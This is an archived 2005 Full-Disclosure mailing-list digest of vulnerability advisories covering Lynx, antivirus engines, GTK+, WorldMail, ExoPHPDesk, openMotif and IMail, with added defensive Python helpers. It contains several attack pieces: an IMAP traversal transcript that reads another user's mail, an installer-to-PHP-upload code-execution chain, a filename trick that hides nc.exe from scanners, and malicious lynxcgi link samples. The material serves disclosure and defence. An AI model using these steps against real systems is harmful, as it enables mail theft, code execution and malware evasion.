[Full-disclosure] iDefense Security Advisory 11.11.05: Multiple Vendor Lynx Command Injection Vulnerability

2005-11-11 Thread [EMAIL PROTECTED]

Multiple Vendor Lynx Command Injection Vulnerability

iDefense Security Advisory 11.11.05
www.idefense.com/application/poi/display?id=338&type=vulnerabilities
November 11, 2005

I. BACKGROUND

Lynx is a fully-featured WWW client for users running cursor-
addressable, character-cell display devices such as vt100 terminals and
terminal emulators. Lynx supports a number of protocols including HTTP,
HTTPS, gopher, FTP, WAIS, NNTP, finger or cso/ph/qi servers, and
services accessible via logons to telnet, tn3270 or rlogin accounts.

II. DESCRIPTION

Remote exploitation of a command injection vulnerability in various
vendors' implementations of Lynx could allow attackers to execute
arbitrary commands with the privileges of the underlying user.

The problem specifically exists within the feature to execute local
cgi-bin programs via the "lynxcgi:" URI handler. The handler is
generally intended to be restricted to a specific directory or
program(s). However, due to a configuration error on multiple platforms,
the default settings allow for arbitrary websites to specify commands to
run as the user running Lynx.

III. ANALYSIS

Successful exploitation of the described vulnerability allows remote
attackers to execute arbitrary commands with the privileges of the
underlying user. Exploitation requires that an attacker convince a
target user to follow a malicious link from within a vulnerable version
of Lynx. The "lynxexec" and "lynxprog" URI handlers can also be used to
trigger the issue. However, they are rarely compiled into the Lynx
binary.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in the latest
stable release of Lynx, version 2.8.5. It is suspected that earlier
versions are also affected. The following vendors include susceptible
Lynx packages within their respective distributions:

   * Red Hat Inc.
   * Gentoo Foundation Inc.
   * Mandriva SA

Other vendors are suspected as also being vulnerable. The following
vendors include Lynx packages that are not susceptible to exploitation
as the "lynxcgi" feature is not compiled into Lynx by default:

   * The FreeBSD Project
   * OpenBSD

V. WORKAROUND

Disable "lynxcgi" links by specifying the following directive in
lynx.cfg:

   TRUSTED_LYNXCGI:none
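
As an added example (not part of the iDefense advisory and not Lynx's own code), the following Python audits a lynx.cfg for the TRUSTED_LYNXCGI directive and lists the links on a page that would trigger the lynxcgi:, lynxexec: or lynxprog: handlers. It assumes the directive syntax `TRUSTED_LYNXCGI:<value>` with `none` disabling the handler as the advisory states, that several TRUSTED_LYNXCGI lines each add one trusted path prefix (a reading of the Lynx documentation, not something the advisory says), and that the exact form of a lynxcgi: URL is only illustrated here; the sample configurations and page are constructed.

```python
"""Audit helpers for the lynxcgi: issue.  Added example; not iDefense's or
Lynx's own code.  The sample configurations and HTML below are constructed."""

import re

CFG_STOCK = """\
# lynx.cfg excerpt (constructed).  Stock packages shipped with lynxcgi
# compiled in and this line still commented out, which is the condition
# the advisory describes.
STARTFILE:http://lynx.isc.org/
#TRUSTED_LYNXCGI:none
"""

CFG_WORKAROUND = """\
STARTFILE:http://lynx.isc.org/
TRUSTED_LYNXCGI:none
"""

CFG_RESTRICTED = """\
# Assumed semantics: each line names one path prefix under which lynxcgi
# programs may be run.
TRUSTED_LYNXCGI:/usr/lib/cgi-bin/
TRUSTED_LYNXCGI:/var/www/cgi-bin/
"""

_TRUSTED = re.compile(r"^[ \t]*TRUSTED_LYNXCGI[ \t]*:[ \t]*(\S+)",
                      re.IGNORECASE | re.MULTILINE)
_HREF = re.compile(r"""href\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
                   re.IGNORECASE)
_LOCAL_SCHEME = re.compile(r"^\s*lynx(?:cgi|exec|prog):", re.IGNORECASE)


def trusted_lynxcgi_entries(cfg_text):
    """Values of every active (uncommented) TRUSTED_LYNXCGI line, in order."""
    return [m.group(1) for m in _TRUSTED.finditer(cfg_text)]


def lynxcgi_policy(cfg_text):
    """'disabled'     - TRUSTED_LYNXCGI:none present (the advisory's workaround)
       'restricted'   - trusted prefixes listed (assumed lynx.cfg semantics)
       'unrestricted' - no directive: per the advisory the shipped default
                        then lets any page choose the command to run when
                        lynxcgi support is compiled in."""
    entries = trusted_lynxcgi_entries(cfg_text)
    if any(e.lower() == "none" for e in entries):
        return "disabled"
    return "restricted" if entries else "unrestricted"


def local_exec_links(html):
    """hrefs that would reach the lynxcgi:/lynxexec:/lynxprog: handlers,
    i.e. what a malicious page in this attack has to contain."""
    links = []
    for m in _HREF.finditer(html):
        url = next(g for g in m.groups() if g is not None)
        if _LOCAL_SCHEME.match(url):
            links.append(url.strip())
    return links


# Constructed page; the lynxcgi: paths are illustrative, not a real target.
SAMPLE_PAGE = """<html><body>
<a href="http://lynx.isc.org/">fine</a>
<a href="lynxcgi:/tmp/evil.cgi">click me</a>
<A HREF='lynxexec:/tmp/evil.sh'>also bad</A>
<a href=lynxprog:/tmp/x>unquoted</a>
</body></html>"""

if __name__ == "__main__":
    for name, cfg in (("stock", CFG_STOCK), ("workaround", CFG_WORKAROUND),
                      ("restricted", CFG_RESTRICTED)):
        print(f"{name:11s} -> {lynxcgi_policy(cfg)}")
    print("local-exec links:", local_exec_links(SAMPLE_PAGE))
```

Run against a real lynx.cfg the policy function tells you whether the workaround is in place; the link scanner is what a mail or proxy filter would apply to HTML before a Lynx user follows it.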

VI. VENDOR RESPONSE

Development version 2.8.6dev.15 has been released to address this issue
and is available from the following URLs:

 http://lynx.isc.org/current/lynx2.8.6dev.15.tar.Z
 http://lynx.isc.org/current/lynx2.8.6dev.15.tar.bz2
 http://lynx.isc.org/current/lynx2.8.6dev.15.tar.gz
 http://lynx.isc.org/current/lynx2.8.6dev.15.zip

Alternately, an incremental patch is available at:

 http://lynx.isc.org/current/2.8.6dev.15.patch.gz

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-2929 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/27/2005  Initial vendor notification
10/28/2005  Initial vendor response
11/11/2005  Public disclosure

IX. CREDIT

vade79 (http://fakehalo.us) is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [xfocus-AD-051115] Multiple antivirus failed to scan malicious filename bypass vulnerability

2005-11-14 Thread [EMAIL PROTECTED]
[xfocus-AD-051115] Multiple antivirus engines fail to scan files with
malicious filenames (bypass vulnerability)

Discovered by: [EMAIL PROTECTED]
Class: design error
Threat level: medium


Vulnerable anti-virus Engine:

Kaspersky Antivirus
Symantec AntiVirus
F-Prot Antivirus
ClamWin Antivirus
Avast Antivirus
RAV AntiVirus
Microsoft AntiSpyware

tested anti-virus vendor:

Symantec AntiVirus Corporate 8.0
Kaspersky Antivirus Personal Pro 4.5.0.104
Kaspersky Antivirus For MS NTServer 4.5.0.104
F-Prot Antivirus 3.16c
ClamWin Antivirus 0.87
Avast.Professional.Edition.v4.6.603
RAV.AntiVirus.Desktop.v8.6
Microsoft AntiSpyware beta1


1.Summary:


   Windows allows many kinds of special characters in filenames. Some
anti-virus engines are unable to handle filenames containing these
special byte sequences, so their file operations on such files fail and
the files are never scanned.


2. Detail:

   Demonstration here:

   Take a malicious file that is normally detected, such as nc.exe, and
rename it to nc??.exe, where ?? stands for the bytes C0 D7 BA DC (hex).

   The renamed file is no longer detected by the antivirus scan.

   Because such a name cannot be typed directly, use the 8.3 short name
shown by "dir /x" to run the file:

   [EMAIL PROTECTED]:\Vul\bugtrap]#dir /x

   1998-01-03  14:37            59,392 NC294E~1.EXE nc??.exe

   [EMAIL PROTECTED]:\Vul\bugtrap]#NC294E~1.EXE -help
   [v1.10 NT]
   connect to somewhere:   nc [-options] hostname port[s] [ports] ...
   listen for inbound: nc -l -p port [options] [hostname] [port]
   options:

   Through the MS-DOS (8.3) short name the file can still be opened,
read, written and copied normally.

   In fact most vendors have trouble handling this kind of filename. For
instance, right-clicking such a file produces no "scan" entry in the
context menu with Kaspersky Anti-Virus; Symantec AntiVirus Corporate
10.0.1.1000 detects the file but cannot remove it; and AVG Anti-Virus
passes the file in a normal path scan and cannot read it when scanned
from the context menu.
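
As an added example (not the xfocus advisory's code and not any vendor's), the following Python parses `dir /x` output and chooses the 8.3 short name for entries whose long name contains bytes outside printable ASCII, so that a scanner or an incident responder can open the file the way the advisory does. The listing is constructed to mirror the advisory's entry, with the bytes C0 D7 BA DC taken from the advisory. It assumes the `dir /x` column layout of the Windows versions of the time, handles only file rows that carry a numeric size (directories are skipped), and does not resolve short names itself; on a live system you would call GetShortPathNameW rather than parse text.

```python
"""Select scannable paths from `dir /x` output.  Added example, not code
from the xfocus advisory or from any anti-virus vendor."""

import re

# Constructed listing modelled on the advisory's entry; not a real capture.
# The long name carries the raw bytes C0 D7 BA DC cited in the advisory.
SAMPLE_DIR_X = (
    b" Directory of C:\\Vul\\bugtrap\r\n"
    b"\r\n"
    b"1998-01-03  14:37            59,392 NC294E~1.EXE nc\xc0\xd7\xba\xdc.exe\r\n"
    b"2005-11-14  09:12             1,024              readme.txt\r\n"
    b"               2 File(s)         60,416 bytes\r\n"
)

# date, time, size, then the name column(s); rows with <DIR> do not match
_ROW = re.compile(rb"^(\d{4}-\d{2}-\d{2})\s+(\d{2}:\d{2})\s+([\d,]+)\s+(.*?)\s*$")
# Generated 8.3 aliases: up to 8 characters, optional dot plus up to 3,
# upper case only.
_SHORT_83 = re.compile(
    rb"^[A-Z0-9_~$!#&@{}()'^-]{1,8}(?:\.[A-Z0-9_~$!#&@{}()'^-]{1,3})?$")


def parse_dir_x(output):
    """One dict (size, short or None, long) per file row."""
    entries = []
    for line in output.splitlines():
        m = _ROW.match(line)
        if not m:
            continue
        size = int(m.group(3).replace(b",", b""))
        names = m.group(4)
        short, long_name = None, names
        # `dir /x` leaves the short column blank when the long name already
        # fits 8.3, so only an 8.3-looking first token followed by more text
        # is an alias.
        two = re.match(rb"^(\S+)\s+(\S.*)$", names)
        if two and _SHORT_83.match(two.group(1)):
            short, long_name = two.group(1), two.group(2)
        entries.append({"size": size, "short": short, "long": long_name})
    return entries


def needs_short_name(long_name):
    """True for names the advisory's failing engines could not open: any
    byte outside printable ASCII."""
    return any(b < 0x20 or b >= 0x7F for b in long_name)


def scan_paths(output, directory):
    """Full paths a scanner should open: the 8.3 alias where the long name is
    risky and an alias exists, otherwise the long name."""
    paths = []
    for e in parse_dir_x(output):
        risky = e["short"] is not None and needs_short_name(e["long"])
        name = e["short"] if risky else e["long"]
        paths.append(directory.rstrip(b"\\") + b"\\" + name)
    return paths


if __name__ == "__main__":
    for p in scan_paths(SAMPLE_DIR_X, b"C:\\Vul\\bugtrap"):
        print(p)
```

The selection is deliberately byte-based: the failure the advisory describes is in the engine's handling of the name, so the decision must be made before any attempt to decode it in the system code page.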


3. Credits:

   Thanks to [EMAIL PROTECTED] for translating this advisory, and to all
members of the xfocus team and everyone who supports it.


4. About xfocus:


Xfocus is a non-profit and free technology organization founded in China
in 1998. We are devoted to researching and demonstrating weaknesses
related to network services and communication security.

homepage http://www.xfocus.org/

-EOF

-- 

Kind Regards,

---
[EMAIL PROTECTED]

XFOCUS Security Team
http://www.xfocus.org



[Full-disclosure] iDEFENSE Security Advisory 11.15.05: Multiple Vendor GTK+ gdk-pixbuf XPM Loader Heap Overflow Vulnerability

2005-11-15 Thread [EMAIL PROTECTED]

Multiple Vendor GTK+ gdk-pixbuf XPM Loader Heap Overflow Vulnerability

iDEFENSE Security Advisory 11.15.05
www.idefense.com/application/poi/display?id=339&type=vulnerabilities
November 15, 2005

I. BACKGROUND

GTK+ is a multi-platform toolkit for creating graphical user interfaces.
Offering a complete set of widgets, GTK+ is suitable for projects
ranging from small one-off projects to complete application suites.

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in various vendors'
implementations of the GTK+ gdk-pixbuf XPM image rendering library could
allow for arbitrary code execution.

The vulnerability specifically exists due to an integer overflow while
processing XPM files. The following code snippet illustrates the
vulnerability:

if (n_col <= 0 || n_col >= G_MAXINT / (cpp + 1)) {
        g_set_error (error,
                     GDK_PIXBUF_ERROR,
                     GDK_PIXBUF_ERROR_CORRUPT_IMAGE,
                     _("XPM file has invalid number of colors"));
        return NULL;
}
[...]
colors = (XPMColor *) g_try_malloc ((sizeof (XPMColor) * n_col));
[...]


The validity check of n_col is enough to prevent an integer overflow in
the first g_try_malloc, however there is not a proper check for the
second g_try_malloc, which allows an undersized heap buffer to be
allocated, then overflowed while using n_col as an upper bounds in a
copying loop. This can be used to execute arbitrary code via traditional
heap overflow 4 byte write methods or by overwriting adjacent areas of
the heap with important values such as function pointers.
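
To make the arithmetic concrete, here is an added Python model (not gdk-pixbuf code) of the n_col check quoted above, evaluated the way a 32-bit size computation would see it. It assumes sizeof(XPMColor) is 16 bytes (the real value depends on the compiler and ABI), that the copying loop the advisory describes writes one XPMColor per colour into `colors`, and 32-bit size arithmetic; on an LP64 build the size_t product does not wrap, which is why the advisory's confirmation on a 32-bit build matters.

```python
"""32-bit model of the XPM n_col check.  Added example, not gdk-pixbuf code."""

G_MAXINT = 2**31 - 1
UINT32 = 2**32
SIZEOF_XPMCOLOR = 16   # assumption for illustration; the real size is ABI-dependent


def u32(x):
    """Wrap an arbitrary-precision product the way a 32-bit size_t would."""
    return x % UINT32


def passes_ncol_check(n_col, cpp):
    """The check quoted in the advisory, unchanged."""
    return not (n_col <= 0 or n_col >= G_MAXINT // (cpp + 1))


def name_buf_size(n_col, cpp):
    """The allocation the check actually bounds: n_col * (cpp + 1) bytes."""
    return u32(n_col * (cpp + 1))


def colors_alloc_size(n_col):
    """What g_try_malloc receives for `colors` once the product wraps."""
    return u32(SIZEOF_XPMCOLOR * n_col)


def colors_bytes_written(n_col):
    """What a copying loop bounded by n_col will actually write."""
    return SIZEOF_XPMCOLOR * n_col


def undersized_colors_buffer(n_col, cpp):
    """Passes the shipped check yet gets a `colors` buffer smaller than the
    loop writes: the heap overflow the advisory describes."""
    return (passes_ncol_check(n_col, cpp)
            and colors_alloc_size(n_col) < colors_bytes_written(n_col))


def hardened_check(n_col, cpp):
    """Shipped check plus a bound for the allocation the check missed."""
    return passes_ncol_check(n_col, cpp) and n_col < G_MAXINT // SIZEOF_XPMCOLOR


def smallest_wrapping_ncol(cpp):
    """Smallest n_col for which SIZEOF_XPMCOLOR * n_col reaches 2^32 while
    the shipped check still passes, or None if the check already blocks it."""
    n = -(-UINT32 // SIZEOF_XPMCOLOR)   # ceil(2^32 / sizeof(XPMColor))
    return n if passes_ncol_check(n, cpp) else None


if __name__ == "__main__":
    n = smallest_wrapping_ncol(1) + 1
    print(f"cpp=1 n_col={n}: check passes={passes_ncol_check(n, 1)}, "
          f"colors alloc={colors_alloc_size(n)} bytes, "
          f"loop writes={colors_bytes_written(n)} bytes")
```

With cpp = 1 the check only requires n_col < G_MAXINT / 2, so a header declaring 268435457 colours is accepted; 16 * 268435457 wraps to 16, and the loop then writes four gigabytes' worth of entries into a 16-byte heap block. Adding the second bound (n_col < G_MAXINT / sizeof(XPMColor)) rejects the same header.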

III. ANALYSIS

Exploitation could allow for arbitrary code execution in the context of
the user running the affected application. As this library is used in a
variety of applications, this vulnerability could be exploited either
remotely, via a networked application or locally.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in gtk+ 2.4.0
compiled from source. It is suspected that previous versions are also
affected by this vulnerability. The following vendors include
susceptible GTK+ and GdkPixBuf packages within their respective
operating system distributions:

   The Debian Project:
 Debian GNU/Linux 3.0 and 3.1 (all architectures)
   Mandriva (formerly Mandrakesoft):
 Mandriva Linux (formerly Mandrakelinux) 10.0 and 10.1,
 Corporate Server 3.0
   Novell Inc.:
 SuSE Linux 8.2, 9.0, 9.1 and 9.2
   Red Hat Inc.:
 Red Hat Enterprise Linux 2.1, 3, 4,
 Fedora Core 3, 4

V. WORKAROUND

Users should not open untrusted media files.

VI. VENDOR RESPONSE

Red Hat Inc.:

"This issue affects the gtk2 packages as shipped with Red Hat Enterprise
Linux 3 and 4, and the gdk-pixbuf packages as shipped with Red Hat
Enterprise Linux 2.1, 3, and 4.  Updates to these packages are available
at the URL below or by using the Red Hat Network up2date tool.
http://rhn.redhat.com/errata/CVE-2005-3186.html

This issue affects the gtk2 and gdk-pixbuf packages as shipped with
Fedora Core 3 and 4."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3186 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/14/2005  Initial vendor response
11/15/2005  Coordinated public disclosure

IX. CREDIT

infamous41md is credited with the discovery of this vulnerability.



[Full-disclosure] iDEFENSE Security Advisory 11.15.05: Multiple Vendor Insecure Call to CreateProcess() Vulnerability

2005-11-15 Thread [EMAIL PROTECTED]
ing into the problem, and it seems that this is
not present in the current version of KAV for File Servers."

Microsoft:

"Microsoft has confirmed that the Beta 2 version of its Antispyware
product, targeted for release later this year, will address the issue
reported by iDEFENSE."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
following names to this issue.

RealNetworks RealPlayer 10.5
 CAN-2005-2936

Kaspersky Anti-Virus 5.0
 CAN-2005-2937

Apple iTunes 4.7.1.30
 CAN-2005-2938

VMWare Workstation 5.0.0 build-13124
 CAN-2005-2939

Microsoft Antispyware 1.0.509 (Beta 1)
 CAN-2005-2940

These are candidates for inclusion in the CVE list
(http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

09/19/2005  Initial vendor notification
11/15/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.



[Full-disclosure] iDEFENSE Security Advisory 11.17.05: Qualcomm WorldMail IMAP Server Directory Traversal Vulnerability

2005-11-17 Thread [EMAIL PROTECTED]

Qualcomm WorldMail IMAP Server Directory Traversal Vulnerability

iDEFENSE Security Advisory 11.17.05
www.idefense.com/application/poi/display?id=341&type=vulnerabilities
November 17, 2005

I. BACKGROUND

Qualcomm WorldMail is an email and messaging server designed for use
in small to large enterprises that supports IMAP, POP3, SMTP, and web
mail features.

More information can be found on the vendors site:

 http://www.eudora.com/worldmail/

II. DESCRIPTION

Remote exploitation of a directory traversal vulnerability in Qualcomm
WorldMail IMAP Server allows attackers to read any email stored on the
system.

The IMAP protocol supports multiple folders and contains commands which
allow users to specify paths. Qualcomm WorldMail server allows several
of these commands to name folders outside of the current user's mailbox.

Attackers can leverage this vulnerability to view and manage any other
user's email messages stored on the system. Attackers also have the
ability to move any arbitrary folder on the system.

Exploitation is trivial and can be done with a simple telnet client.
Below is an example transaction highlighting the attack:

---
c:\> telnet 192.168.0.109 143

* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed

2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox

2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox

2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}

this message was sent to administrator

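As an added example of the server-side check the transcript shows WorldMail does not perform (this is illustration written for this page, not Qualcomm code), the following Python confines a mailbox name from SELECT, LIST, RENAME and similar commands to the authenticated user's mail root and rejects the `./../../administrator/inbox` form used above. It assumes mailboxes are stored as directories under a per-user root, that both `/` and `\` act as separators, and that a leading `/` denotes the root mailbox as in the transcript's `select /inbox`; the root path is made up.

```python
"""Confine IMAP mailbox names to the authenticated user's mail root.  Added
example of the check the advisory says WorldMail lacks; not Qualcomm code."""

import posixpath


class MailboxTraversal(ValueError):
    """Raised when a mailbox name would leave the user's mail root."""


def resolve_mailbox(user_root, requested):
    """Map a client-supplied mailbox name onto a path under user_root, or
    raise MailboxTraversal.  Assumptions: directory-per-mailbox storage, '/'
    and '\\' both separators, leading '/' meaning the root mailbox."""
    name = requested.replace("\\", "/").lstrip("/")
    if not name or "\x00" in name:
        raise MailboxTraversal(f"invalid mailbox name {requested!r}")
    # normpath collapses '.' and 'a/..' but keeps leading '..' components,
    # which is what the transcript's './../../administrator/inbox' turns into.
    norm = posixpath.normpath(name)
    if norm == ".." or norm.startswith("../") or posixpath.isabs(norm):
        raise MailboxTraversal(f"mailbox {requested!r} escapes {user_root!r}")
    full = posixpath.join(user_root, norm)
    # Final containment test, independent of the component checks above.
    root = user_root.rstrip("/") + "/"
    if not full.startswith(root):
        raise MailboxTraversal(f"mailbox {requested!r} escapes {user_root!r}")
    return full


def is_confined(user_root, requested):
    """Boolean wrapper for bulk checks or for logging rejected names."""
    try:
        resolve_mailbox(user_root, requested)
        return True
    except MailboxTraversal:
        return False


if __name__ == "__main__":
    ROOT = "/srv/mail/user1"            # made-up per-user mail root
    for name in ("/inbox", "Sent/../inbox", "./../../administrator/inbox",
                 "..\\..\\administrator\\inbox"):
        verdict = "ok    " if is_confined(ROOT, name) else "REJECT"
        print(f"{verdict} {name}")
```

The two-stage check (component inspection, then a prefix test on the final path) is deliberate: the component test gives a clear error for the attack pattern, the prefix test catches anything the first stage mis-parses.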

III. ANALYSIS

Successful exploitation of this vulnerability allows attackers to view
and delete mail from any user on the system. Attackers may also be able
to affect system stability with the ability to move arbitrary folders on
the affected system.

This is a post authentication exploit. In order to exploit this
vulnerability an attacker would need a valid login to the email server
and the IMAP module would have to be enabled (default).

IV. DETECTION

This exploit was tested against Qualcomm Worldmail server version 3.0.
Other versions may be vulnerable.

V. WORKAROUND

As the affected commands cannot be disabled, it is important that only
trusted users be allowed to access the vulnerable mail server.
Exploitation of this vulnerability can only be done after a user is
authenticated to the mail server. Therefore, it is recommended that
login credentials be reviewed to ensure that only trusted users have
access.

WorldMail also supports POP access to email. If disabling the IMAP
service completely is an option, this will also prevent exploitation of
the vulnerability.

VI. VENDOR RESPONSE

Multiple attempts have been made to inform the vendor of this
vulnerability but to date a response has not yet been received.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3189 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/27/2005  Initial vendor response
11/17/2005  Public disclosure

IX. CREDIT

The vulnerability was discovered by FistFuXXer.



[Full-disclosure] ExoPHPDesk is helpdesk written in PHP/SQL.

2005-11-18 Thread [EMAIL PROTECTED]

===


Title: ExoPHPDesk Multiple Remote Vulnerabilities
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 15/11/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: v1.2
vendor: http://exoscripts.com/




* Summary *

ExoPHPDesk is helpdesk written in PHP/SQL.

-

* Problem Description *

The default installation does not remove install.php.
1- Remote users can re-run the installer: install.php
2- Change the admin username and password: install.php?step=4
3- Log in to the admin system and edit the attachment configuration so
   that .php uploads are accepted: admin.php?action=configuration
4- Upload a .php script as a ticket attachment: index.php?fn=ticket&type=add
5- Request [site]/[helpdesk]/[Attachment Dir]/[file].php
6- Execute commands or PHP code :).
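
As an added example of the upload check whose absence the chain above depends on (written for this page, not ExoPHPDesk code), the following Python applies an extension allowlist to attachment names and stores uploads under a random name. The executable-extension and allowed-extension sets are assumptions chosen for the example.

```python
"""Attachment-name policy for a PHP helpdesk upload handler.  Added example;
not ExoPHPDesk code.  Extension sets below are assumptions."""

import os
import secrets

# Extensions a typical web server hands to an interpreter; an attachment
# stored under any of these is remote code execution.  Assumed list.
SERVER_EXECUTABLE = {
    "php", "php3", "php4", "php5", "phtml", "phps", "phar",
    "cgi", "pl", "py", "sh", "asp", "aspx", "jsp", "htaccess",
}
# What a helpdesk actually needs to accept.  Assumed allowlist.
ALLOWED = {"txt", "log", "pdf", "png", "jpg", "jpeg", "gif", "zip"}


def attachment_allowed(filename, allowed=ALLOWED):
    """True only if the final extension is allowlisted and no extension
    anywhere in the name could be interpreted by the server.  Checking every
    extension, not just the last, is what stops 'shell.php.jpg' on servers
    that map multiple extensions."""
    base = os.path.basename(filename.replace("\\", "/")).strip().lower()
    if not base or base.startswith("."):
        return False                      # hidden files, '.htaccess'
    parts = base.split(".")
    if len(parts) < 2:
        return False                      # no extension at all
    exts = parts[1:]
    if any(e in SERVER_EXECUTABLE for e in exts):
        return False                      # 'shell.php', 'shell.php.jpg'
    return exts[-1] in allowed


def stored_name(filename):
    """Name to write to disk: random token plus the validated extension, so
    the uploader's chosen name never reaches the filesystem."""
    if not attachment_allowed(filename):
        raise ValueError(f"attachment rejected: {filename!r}")
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name in ("report.pdf", "shell.php", "shell.php.jpg", ".htaccess"):
        print(f"{name:14s} allowed={attachment_allowed(name)}")
```

Even with this check in place the installer still has to go: a re-runnable install.php lets an attacker rewrite the configuration that the check reads.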

-

* Fix *

1-Remove install.php.



2-



-

* References *

http://www.soulblack.com.ar/repo/papers/advisory/exophpdesk_advisory.txt

-

* Credits *

Vulnerability reported by SoulBlack Security Research.



--
SoulBlack - Security Research
http://www.soulblack.com.ar


Re: [Full-disclosure] Computer Terrorism Security Advisory (Reclassification) - Microsoft Internet Explorer JavaScript Window() Vulnerability

2005-11-21 Thread [EMAIL PROTECTED]
> Is it just me or did this exploit just DOS'ed my
> Firefox 1.0.7(Debian 
> Linux).
> Just try the Windows XP Link given in the POC URL.
> Firefox just hung with 100% CPU utilization.
> Same can be seen with Flock(http://flock.com).

Same with Firefox 1.5-rc3 on Windows 2003.





[Full-disclosure] [xfocus-SD-051202]openMotif libUil Multiple vulnerability

2005-12-01 Thread [EMAIL PROTECTED]
Title:  [xfocus-SD-051202]openMotif-libUil-Multiple_vulnerability

Affected version: openmotif 2.2.3 (2.2.4 was not available to us, so it
was not tested)
Product: http://www.motifzone.net/

xfocus (http://www.xfocus.org) has discovered multiple vulnerabilities in
the openmotif libUil library. Details follow:

1: libUil.so diag_issue_diagnostic buffer overflow

Clients/uil/UilDiags.c
diag_issue_diagnostic()
202 void diag_issue_diagnostic
203     ( int d_message_number, src_source_record_type *az_src_rec,
204       int l_start_column, ...)
205
206 {
207     va_list ap;                  /* ptr to variable length parameter */
208     int severity;                /* severity of message */
209     int message_number;          /* message number */
210     char msg_buffer[132];        /* buffer to construct message */
211     char ptr_buffer[buf_size];   /* buffer to construct pointer */
212     char loc_buffer[132];        /* buffer to construct location */
213     char src_buffer[buf_size];   /* buffer to hold source line */
...
293     va_start(ap, l_start_column);
294
295 #ifndef NO_MESSAGE_CATALOG
296 [1.1] vsprintf( msg_buffer,
297               catgets(uil_catd, UIL_SET1, msg_cat_table[ message_number ],
298                       diag_rz_msg_table[ message_number ].ac_text),
299               ap );
300 #else
301 [1.2] vsprintf( msg_buffer,
302               diag_rz_msg_table[ message_number ].ac_text,
303               ap );
304 #endif
305     va_end(ap);
The vsprintf() calls at [1.1] and [1.2] write into the fixed-size
msg_buffer[132] with no length limit, so user-supplied arguments in ap
can overflow it; any local or remote application that uses this library
may thereby be made to execute arbitrary code.

2: libUil.so open_source_file buffer overflow

Clients/uil/UilSrcSrc.c

620 status
621 open_source_file( XmConst char           *c_file_name,
622                   uil_fcb_type           *az_fcb,
623                   src_source_buffer_type *az_source_buffer )
624 {
625
626     static unsigned short   main_dir_len = 0;
627     boolean                 main_file;
628     int                     i;          /* loop index through include files */
629     char                    buffer[256];
630
631
632     /* place the file name in the expanded_name buffer */
633
634 [2.1]   strcpy(buffer, c_file_name);
635
636     /* Determine if this is the main file or an include file.  */
637
638     main_file = (main_fcb == NULL);
639

At [2.1] strcpy() copies c_file_name into the 256-byte stack buffer with
no length check, so a longer file name overflows it, as above.

--EOF


[Full-disclosure] iDEFENSE Security Advisory 12.06.05: Ipswitch Collaboration Suite SMTP Format String Vulnerability

2005-12-06 Thread [EMAIL PROTECTED]


Ipswitch Collaboration Suite SMTP Format String Vulnerability

iDEFENSE Security Advisory 12.06.05
www.idefense.com/application/poi/display?id=346&type=vulnerabilities
December 6, 2005

I. BACKGROUND

Ipswitch Collaboration Suite provides e-mail and real-time
collaboration, calendar and contact list sharing, and protection from
spam and viruses, all delivered in an easy to use suite.

http://www.ipswitch.com/products/collaboration/index.asp

II. DESCRIPTION

Remote exploitation of a format string vulnerability in Ipswitch
IMail allows remote attackers to execute arbitrary code.

The vulnerability specifically exists due to improper use of functions
which allow format specifiers in the SMTP service included with ICS.
Remote attackers can supply format string values to certain string
functions to cause memory corruption leading to remote code execution.
The vulnerability may be exploited by supplying specially crafted
strings to any of the following SMTP commands: EXPN, MAIL, MAIL FROM,
RCPT TO. All of the commands are handled by the same function which
parses user-supplied input strings. The following debugger session
shows a backtrace with user-supplied strings as values. With properly
constructed input value, the strings would be interpreted as memory
addresses that would be executed upon returning from the current
function.

[..]
00A7F370   006020A0
00A7F374   00A7F634  ASCII 5B,"192.168.242.1] MAIL
 FROM:C:\apps\Ipswitch\Collaboration
 Suite\IMail\spool\T94e8013e0005"
00A7F378   
00A7F37C   
00A7F380   7C34FC0B  RETURN to MSVCR71.7C34FC0B from MSVCR71.write_char
00A7F384   00602048
00A7F388   00A7F648  ASCII 20,"FROM:C:\apps\Ipswitch\Collaborat"
[..]
